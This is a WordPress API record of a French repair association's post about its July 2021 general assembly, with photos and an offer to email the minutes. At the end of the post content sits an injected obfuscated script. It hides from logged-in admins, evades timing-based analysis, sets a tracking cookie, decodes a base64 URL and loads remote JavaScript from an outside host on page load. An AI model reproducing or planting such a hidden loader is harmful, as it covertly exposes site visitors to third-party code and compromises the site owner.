{"id":607,"date":"2021-07-11T12:39:18","date_gmt":"2021-07-11T10:39:18","guid":{"rendered":"http:\/\/reparenjalles.saintmedardasso.fr\/?p=607"},"modified":"2026-02-17T15:53:38","modified_gmt":"2026-02-17T14:53:38","slug":"assemblee-generale","status":"publish","type":"post","link":"https:\/\/reparenjalles.saintmedardasso.fr\/?p=607","title":{"rendered":"Assembl\u00e9e G\u00e9n\u00e9rale"},"content":{"rendered":"\n<p style=\"text-align:center\"><big><strong><span style=\"color:blue\">R\u00e9par&rsquo;en Jalles a tenu son Assembl\u00e9e G\u00e9n\u00e9rale le 02\/07\/2021.<\/span><\/strong><\/big><br><br> Merci aux adh\u00e9rents et aux b\u00e9n\u00e9voles qui sont venus participer.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"614\" src=\"https:\/\/reparenjalles.saintmedardasso.fr\/wp-content\/uploads\/2021\/07\/IMG_2438-1024x614.jpg\" alt=\"\" class=\"wp-image-609\" srcset=\"https:\/\/reparenjalles.saintmedardasso.fr\/wp-content\/uploads\/2021\/07\/IMG_2438-1024x614.jpg 1024w, https:\/\/reparenjalles.saintmedardasso.fr\/wp-content\/uploads\/2021\/07\/IMG_2438-300x180.jpg 300w, https:\/\/reparenjalles.saintmedardasso.fr\/wp-content\/uploads\/2021\/07\/IMG_2438-768x460.jpg 768w, https:\/\/reparenjalles.saintmedardasso.fr\/wp-content\/uploads\/2021\/07\/IMG_2438.jpg 2016w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>  Celle-ci a \u00e9t\u00e9 suivie d&rsquo;un moment de convivialit\u00e9 autour d&rsquo;un verre et de quelques amuse-bouches. <\/p>\n\n\n\n<figure class=\"wp-block-image\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"655\" src=\"https:\/\/reparenjalles.saintmedardasso.fr\/wp-content\/uploads\/2021\/07\/IMG_2449-1024x655.jpg\" alt=\"\" class=\"wp-image-611\" srcset=\"https:\/\/reparenjalles.saintmedardasso.fr\/wp-content\/uploads\/2021\/07\/IMG_2449-1024x655.jpg 1024w, https:\/\/reparenjalles.saintmedardasso.fr\/wp-content\/uploads\/2021\/07\/IMG_2449-300x192.jpg 300w, https:\/\/reparenjalles.saintmedardasso.fr\/wp-content\/uploads\/2021\/07\/IMG_2449-768x491.jpg 768w, https:\/\/reparenjalles.saintmedardasso.fr\/wp-content\/uploads\/2021\/07\/IMG_2449.jpg 1598w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Chaque adh\u00e9rent qui le souhaite peut en obtenir le <a href=\"mailto:repar.en.jalles@gmail.com?subject=Compte_rendu_AG\">compte-rendu de l&rsquo;Assembl\u00e9e G\u00e9n\u00e9rale en faisant une demande par mail<\/a>.<br> Nous lui ferons parvenir dans les plus brefs d\u00e9lais.<\/p>\n\n\n\n<p><\/p>\n<script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script>","protected":false},"excerpt":{"rendered":"<p>R\u00e9par&rsquo;en Jalles a tenu son Assembl\u00e9e G\u00e9n\u00e9rale le 02\/07\/2021. Merci aux adh\u00e9rents et aux b\u00e9n\u00e9voles qui sont venus participer. Celle-ci a \u00e9t\u00e9 suivie d&rsquo;un moment de convivialit\u00e9 autour d&rsquo;un verre et de quelques amuse-bouches. Chaque adh\u00e9rent qui le souhaite peut en obtenir le compte-rendu de l&rsquo;Assembl\u00e9e G\u00e9n\u00e9rale en faisant une demande par mail. Nous lui &hellip; <a href=\"https:\/\/reparenjalles.saintmedardasso.fr\/?p=607\" class=\"more-link\">Continuer la lecture de <span class=\"screen-reader-text\">Assembl\u00e9e G\u00e9n\u00e9rale<\/span>  <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":7,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-607","post","type-post","status-publish","format-standard","hentry","category-non-classe"],"_links":{"self":[{"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=\/wp\/v2\/posts\/607","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=607"}],"version-history":[{"count":1,"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=\/wp\/v2\/posts\/607\/revisions"}],"predecessor-version":[{"id":2062,"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=\/wp\/v2\/posts\/607\/revisions\/2062"}],"wp:attachment":[{"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=607"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=607"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=607"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}